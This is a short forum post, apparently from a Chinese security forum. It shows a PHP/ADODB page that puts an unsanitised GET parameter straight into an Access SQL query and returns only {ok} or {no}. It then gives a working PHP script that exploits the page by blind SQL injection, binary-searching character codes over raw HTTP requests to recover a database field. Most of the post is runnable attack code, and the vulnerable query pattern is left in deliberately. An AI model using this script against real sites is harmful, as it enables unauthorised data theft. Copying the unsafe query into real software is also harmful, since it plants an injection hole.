From http://www.wolvez.org/forum/thread-231-1-1.html
b.php

<?php
$conn = new com("ADODB.Connection"); 
$connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=". realpath("data.mdb"); 

$conn->Open($connstr); 
$rs = new com("ADODB.RecordSet"); 
$sql="select * from news where id=".$_GET[id];
$rs->Open($sql,$conn,1,1); 
if(! $rs->eof) { 
echo "{ok}"; 
} else{
echo "{no}"; 
}
?>


存在注射的。但是没有输出结果，只是判断是否存在。

<?php

error_reporting(7);
ini_set('max_execution_time', 0);

function send(){
        global $host,$cmd;
        //$cmd .= "";
        $message = "GET /b.php?id=".$cmd." HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Connection: Close\r\n\r\n";

        $fp = fsockopen($host, 80);
        fputs($fp, $message);

        $resp = '';

        while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
        preg_match('/\{ok\}/', $resp, $pre);
        if ($pre) return true;
}

function Binsearch($sql){   
        global $cmd;
        $low="32"; 
        $high="128";   
        while($low<=$high){
                $mid=intval(($low+$high)/2);
                $cmd= $sql."=".$mid;
                echo "$mid";
                if(send()){echo "Lucky\r\n";return $mid;}
                $cmd= $sql."<".$mid;
                if(send()){
                        $high=$mid-1;
                        echo "Bigger\r\n";
                }else{  
                        $low=$mid+1;
                        echo "Smaller\r\n";
                }
        }
        return(-1);
}

$host="127.0.0.1:8080";
$sql="15%20and%20asc(left(name,1))";
echo Binsearch($sql);
?>